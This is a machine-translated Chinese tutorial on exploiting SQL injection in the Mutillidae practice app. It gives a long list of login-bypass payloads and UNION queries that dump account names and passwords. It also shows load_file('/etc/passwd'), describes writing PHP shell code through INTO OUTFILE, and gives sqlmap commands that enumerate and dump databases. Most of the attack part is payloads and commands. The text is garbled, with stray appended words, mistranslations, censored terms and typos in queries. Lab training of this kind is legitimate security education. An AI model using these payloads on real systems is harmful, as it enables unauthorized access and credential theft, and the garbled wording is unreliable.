SQL注入漏洞利用

时间 2020-08-13

标签 sql 注入漏洞利用栏目 SQL 繁體版

原文原文链接

0x00前言

SQL注入是一种注入***，能够执行恶意SQL语句。这些语句控制Web应用程序后面的数据库服务器。***者能够利用SQL 注入漏洞规避应用程序安全性方面的努力。他们能够绕过页面或Web应用程序的身份验证和受权，并恢复整个SQL数据库的内容。他们一样能够利用SQL注入来包含，更改和擦除数据库中的记录。SQL注入漏洞可能会影响使用SQL数据库的任何站点或Web应用程序，例如MySQL，Oracle，MSSQL或其余。***者可能会利用它来增长对您的敏感信息，客户数据，商业秘密，许可创新的未经许可的访问，而这仅仅是冰山一角。php

而因为sql注入漏洞得利用有些普遍，所以咱们将没法说起SQL注入的全部细节，而是从基础知识开始对其中的一些内容进行说明。为此，咱们将使用metasploitable的Mutillidae Web应用程序，该Web应用程序仅出于演示目的容易受到SQL 注入***。

选择“ Mutillidae”连接，而后转到“登陆/注册”选项卡并注册以建立一个账户。sql

提供必要的信息，而后单击“建立账户”按钮。
数据库

如今，让咱们使用一些SQL注入技术来绕过登陆页面，本教程介绍了***者能够用来破坏登陆表单的不一样方法。ubuntu

0x01 在POST字段中发现SQL注入

咱们将在示例中使用的登陆结构很是简单。它包含两个易受***的输入字段（用户名和密码）。后端内容建立查询以批准客户端提供的用户名和密钥。如下是页面基本原理的概述：后端

$ query ="SELECT * FROM users where where username ='$ _ POST [username]'AND password ='$_POST[password]'";安全

为了避开登陆和访问受限区域，***者须要构建一个SQL部分，该部分将更改“ WHERE”子句并将其设为true。例如，随附的登陆数据将经过滥用password参数中存在的弱点来提供对***者的访问权限。对于用户名，请输入“ john.doe”或“ anything”，对于密码，请输入“ anything” or“ 1” ='1）或（admin（or'1'='1），而后尝试登陆，而后您将显示一个管理员登陆页面。

服务器

让咱们看一下生成的查询：网络

SELECT * FROM users，其中username ='john.doe'AND password ='anything'or'1'='1'
因为操做员的优先权，“and”条件将首先评估。框架

而后评估“ OR”运算符，使“ WHERE”语句为真。该条件对“users”表的全部行均有效。这意味着将忽略给定的用户名，而且***者将以“users”表中的主要用户身份登陆。此外，这意味着***者无需知道用户名便可访问框架。查询将为他发现一个！ide

在这些简单的示例中，咱们已经看到***者能够回避使用SQL注入的身份验证系统。在不限制可能形成的灾难性后果的状况下，必须提到的是，SQL注入比登陆绕过具备更大的安全影响。如下是OWASP成员Emin Islam Tatlilf博士建立的命令列表，这些命令可用于SQL注入身份验证旁路。

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin’--
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1'--
admin’ or ‘1’=’1'#
admin’ or ‘1’=’1'/*
admin’or 1=1 or ‘’=’
admin’ or 1=1
admin’ or 1=1--
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1'--
admin’) or (‘1’=’1'#
admin’) or (‘1’=’1'/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1'--
admin’) or ‘1’=’1'#
admin’) or ‘1’=’1'/*
1234 ‘ AND 1=0 UNION ALL SELECT ‘admin’, ‘81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin” #
admin”/*
admin” or “1”=“1
admin” or “1”=“1”--
admin” or “1”=“1”#
admin” or “1”=“1”/*
admin” or 1=1 or ““=“
admin” or 1=1
admin” or 1=1--
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1”=“1
admin”) or (“1”=“1”--
admin”) or (“1”=“1”#
admin”) or (“1”=“1”/*
admin”) or “1”=“1
admin”) or “1”=“1”--
admin”) or “1”=“1”#
admin”) or “1”=“1”/*
1234 “ AND 1=0 UNION ALL SELECT “admin”, “81dc9bdb52d04dc20036dbd8313ed055

0x02 绕过登陆字段

在此示例中，咱们将仅定位用户名字段并尝试得到访问权限。用户名字段也很容易受到***，一样也可能被滥用来访问框架。***者绕过身份验证的要求不高，并且逐渐变得常识，由于他能够选择他可能想要登陆的用户记录。

这是SQL注入***的外观。将（admin'＃）或（admin'--）放在用户名字段中，而后按“ Enter”登陆。咱们使用“＃”或“--”来注释用户名后告诉查询语句的全部内容忽略密码字段的数据库：（选择*来自用户，其中username ='admin'＃AND password =''）。经过使用行注释，***者能够消除部分登陆条件并得到访问权限。这项技术将使“ WHERE”子句仅对一个用户成立。在这种状况下，它是“管理员”。

0x03 基于联合的SQL注入

基于UNION的SQL注入***使分析仪能够有效地从数据库中提取数据。因为若是两个查询的结构彻底相同，则必须使用“ UNION”运算符，所以***者必须像第一个查询同样编写“ SELECT”语句。为此，必须知道一个实质性的表名，可是决定第一个查询中的列数及其信息类型一样相当重要。

在本教程中，咱们将使用Mutillidae 的“用户信息”页面执行基于联合的SQL注入***。转到“ OWASP Top 10 / A1 —注入/ SQLi —提取数据/用户信息”，并使用在咱们上面学习的登陆绕过技术来访问该页面。

咱们全部的***媒介都将使用基于联合的技术在页面的URL部分中执行。

有两种不一样的方法来发现原始查询选择了多少列。首先是注入“ ORDER BY”语句以查询列号。给定指定的列数大于“ SELECT”语句中的列数，将返回错误。不然，结果将按提到的列进行排序。

因为咱们不知道列数，所以咱们从100开始。使用二分法，要找到确切的列数，请减小列数，直到返回与“ ORDER BY”子句相关的错误为止。在此示例中，咱们将其减小到6列并收到一条错误消息，所以这意味着列数少于6。

当咱们输入5列是，它能够工做并显示一些信息。这意味着咱们可使用5列。

接下来，而是采用了“order by”选项，让咱们使用“union select”选项，并提供全部5列。例如：

union select 1,2,3,4,5

如上图中所示，第二、3和4列显示出来了可用，所以咱们能够将这些数字替换为任何数据库值以查看它们对应的含义。让咱们将第2列更改成“ database（）”，将第 3列更改成“ user（）”，将第4列更改成“ version（）”。

例如：

union select 1,database(),user(),version(),5

这个联合命令为咱们提供了一些有用的信息。如今，咱们知道数据库为“ owasp10”，其用户为“ root@localhost”，服务器的版本为“ 5.0.51a-3ubuntu5”。根据这些信息，咱们能够搜索一些漏洞或exp，以进一步破坏目标。

0x04 查找数据库表

在构建查询数据库以提取敏感数据以前，***者必须认识到他须要提取哪些信息以及该信息在数据库中的存储位置。首先，必须意识到您极可能查看数据库用户有权访问的表。换句话说，您的会话客户端极可能会声明或已向客户端授予必定受权的概要表。其余全部表彷佛都不存在。

在MySQL中，表“ information_schema.tables”包含用表项标识的全部元数据。下面列出了此表上最有用的信息。

“ table_name”：表的名称。

“ table_schema”：表模式名。

若是要限制返回到当前模式的表的列表，则能够添加“ WHERE”子句以结合“ DATABASE（）”和“ SCHEMA（）”函数来过滤此列。

例如：

union select 1,table_name,null,null,5 from information_schema.tables where table_schema = ‘owasp10’
在这里，咱们要从“ owasp 10”数据库中检索表名

如上图所见，咱们能够访问多个名为“accounts(帐号)”，“ blogs_table”，“ captured_data”，“ credit_cards”，“ hitlog ”和“ pen_test_tools”的表。

0x05提取敏感数据，例如密码

当***者知道表名时，他须要发现提取数据的列名。在MySQL中，表“ information_schema.columns”提供有关表中列的数据。要提取的最有用的列之一称为“ column_name”。”

例如：

union select 1,colunm_name,null,null,5 from information_schema.columns where table_name = ‘accounts’
在这里，咱们尝试从“账户”表中提取列名称。

一旦发现全部可用的列名，咱们就能够经过在查询语句中添加这些列名来从中提取信息。

例如：

union select 1,username,password,is_admin,5 from accounts

如上图所示，咱们设法检索了与此数据库相关的全部用户名和密码。

0x06 在Web服务器上读写文件

在本小节内容中，我将告诉您访问目标计算机上文档的最佳方法，就像如何将本身的文件和代码传输到目标计算机上同样，而无需踏入目标网站的管理面板。

咱们可使用“ LOAD_FILE（）函数”运算符细读网络服务器中包含的任何文件的内容。一般，咱们将检查“ / etc / password”文件，以查看是否能幸运地得到用户名和密码，以便之后在爆破***中使用。

例：

union select null,load_file(‘/etc/passwd’),null,null,null

咱们将利用“ INTO_OUTFILE（）”函数为它们提供的全部运算符，并尝试经过SQL注入传输外层代码来尝试创建目标服务器的根目录。请记住，这样作的通常目的是告诉您最佳方法，而不会被管理员面板抓住。这种替代方法使您能够从一列中获取内容，并在整洁的文本文件中发现它们，以保持整洁。您还能够利用它来传输PHPShell代码以执行远程文件包含或CMD执行。

例：

union select null,’Hello World!’,null,null,null into outfile ‘/tmp/hello.txt’
在此示例中，咱们将编写“ Hello World！”。句子并将其做为“ hello.txt”文件输出到“ / tmp /”目录中。这个“ Hello World！” 能够用您要在目标服务器中执行的任何PHP Shell代码替换该语句。

如上图中所示，咱们成功添加了文本并将其保存为“ hello.txt”文件在“ / tmp”目录中。

0x07 使用SQLmap发现SQL注入并提取数据

Sqlmap是最主流和突破性的SQL注入自动化工具中的佼佼者。给定一个易受***的HTTP URL请求，sqlmap能够滥用远程数据库并完成大量***操做，例如删除数据库名称，表，列，表中的全部数据，等等。它甚至能够在特定条件下在远程文件系统上读写文档。

不熟悉sqlmap时，可能会很棘手。此sqlmap教学练习旨在以生动，基本的方式展现此主流SQL注入设备的最重要功能。

要启动sqlmap并列出全部可用选项，请键入“ sqlmap --help”。它将提供您须要了解的全部内容以及一些在实践中如何使用它的示例。让咱们更仔细地看一下这个工具。

转到Mutillidae登陆页面，输入一些错误的凭据，而后按“ Enter”以生成流量并建立URL GET参数。

而后复制URL连接，并在sqlmap工具中使用它。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details
这里的“ -u”表明您要执行SQL注入*** 的目标URL。要跳过特定于其余DBMS的测试有效负载，请输入“ Y”。

在搜索的几分钟内，sqlmap已经发现用户名是可注入的而且容易受到***，如屏幕截图所示。

若是要查找更多漏洞，只需让该过程运行到最后，它就能够找到全部可用漏洞。对于演示，咱们将按“ Crtl + C”在此处中止。

在此sqlmap教程中，有关提取数据的事情确实使人着迷。从SQL注入点恢复存储在数据库中的信息是一项艰巨的任务，尤为是当没有结果直接返回到易受***的网页中时。幸运的是，使用sqlmap可以使分析仪提取宝贵的数据片断，而无须手工操做。首先，让咱们使用相似的命令来提取要尝试破解的网站上全部可用的数据库，但最后，为数据库添加“ --dbs”选项。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --dbs

sqlmap提取了全部可用的数据库。要注入更多的SQL查询，咱们须要使用相同的命令来了解当前数据库，但将最后一个参数替换为“ --current-db”。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --current-db
此命令的输出显示咱们位于“ owasp10”数据库中。

如今，使用命令“ --tables –D owasp10”来查看数据库“ owasp10”的全部可用表。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --tables –D owasp10

以下图所示，咱们设法提取了数据库“ owasp10”的全部可用表。

sqlmap还能够经过实现参数“ --columns -T [table_name]”来枚举列。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details --columns -T accounts

***甚至有可能转储整个表或数据库，并使用选项“ --dump”列出全部有价值的信息。

例：

sqlmap –u http://10.10.10.7/mutillidae/index.php?page=user-info.php&username=test&password=test&user-info-php-submit-button=View+Account+Details — columns -T accounts --dump

翻译至medium.com

免责申明：本文由互联网整理翻译而来,仅供我的学习参考,若有侵权,请联系咱们,告知删除。